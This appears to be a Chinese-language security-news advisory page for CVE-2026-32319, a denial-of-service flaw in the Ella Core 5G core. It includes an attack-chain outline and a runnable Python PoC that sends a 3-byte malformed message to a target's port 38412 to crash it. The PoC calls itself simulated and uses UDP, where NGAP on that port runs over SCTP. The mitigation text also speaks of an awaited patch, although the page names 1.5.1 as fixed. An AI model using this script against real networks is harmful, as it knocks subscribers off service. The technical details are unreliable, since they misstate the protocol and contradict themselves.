CVE-2026-32319 CVSS 7.5 高危

CVE-2026-32319: Ella Core 5G核心畸形NAS消息拒绝服务漏洞

披露日期: 2026-03-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32319

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ella Core (5G核心私有网络)

漏洞概述

CVE-2026-32319是Ella Core 5G核心软件中的一个高危拒绝服务漏洞。该漏洞存在于Ella Core 1.5.1之前版本，当处理长度小于7字节的畸形完整性保护NGAP/NAS消息时，会导致程序发生panic崩溃。由于该漏洞位于5G核心网络的关键组件中，攻击成功将造成所有已连接订阅者的服务中断。攻击者无需任何认证即可利用此漏洞，通过网络发送精心构造的畸形NAS消息即可触发崩溃。此漏洞严重影响5G核心网络的可用性和稳定性，属于严重的安全威胁。

技术细节

Ella Core是专为私有网络设计的5G核心软件。在1.5.1之前的版本中，程序在解析完整性保护的NGAP（NG Application Protocol）和NAS（Non-Access Stratum）消息时存在缺陷。当接收到长度小于7字节的畸形消息时，代码未能正确进行边界检查和长度验证，导致内存处理异常并触发panic条件。攻击者可利用此漏洞构造特制的NAS消息，通过网络直接发送到目标Ella Core实例。由于5G核心网络架构的特性，单个组件的崩溃会影响整个网络的连接管理，导致所有活跃订阅者失去服务。CVSS向量显示该漏洞的网络可达性（AV:N）且无需认证（PR:N），配合高可用性影响（A:H），构成严重的拒绝服务风险。

攻击链分析

STEP 1

Reconnaissance

攻击者识别Ella Core 5G核心网络服务的部署位置和监听端口（通常为38412端口）

STEP 2

Payload Crafting

攻击者构造长度小于7字节的畸形完整性保护NAS消息，绕过正常协议验证流程

STEP 3

Exploitation

通过UDP/TCP协议将畸形NAS消息发送至目标Ella Core实例，无需任何认证

STEP 4

Trigger Panic

畸形消息触发代码中的异常处理路径，导致程序panic并崩溃

STEP 5

Impact

Ella Core进程崩溃后，所有连接的5G订阅者失去服务，造成大规模服务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-32319 PoC - Ella Core malformed NAS message DoS
Note: This is a simulated PoC for educational/research purposes
"""
import socket
import struct

def create_malformed_nas_message():
    """Create a malformed NAS message with length < 7 bytes"""
    # Malformed integrity protected NAS message
    # Less than 7 bytes to trigger panic
    nas_message = b'\x00\x01\x02'
    return nas_message

def send_exploit(target_ip, target_port=38412):
    """
    Send malformed NAS message to trigger DoS in Ella Core
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        malformed_msg = create_malformed_nas_message()
        
        print(f"[*] Sending malformed NAS message ({len(malformed_msg)} bytes)")
        print(f"[*] Target: {target_ip}:{target_port}")
        
        sock.sendto(malformed_msg, (target_ip, target_port))
        print("[+] Malformed message sent")
        print("[!] Target should crash due to panic")
        
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 38412
    send_exploit(target, port)

影响范围

Ella Core < 1.5.1

防御指南

临时缓解措施

在官方补丁发布前，建议通过网络分段和访问控制限制对Ella Core的直接访问，部署流量监控和异常检测系统，及时发现和阻断恶意NAS消息。同时可考虑启用日志审计功能，记录所有异常的协议交互以便溯源分析。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表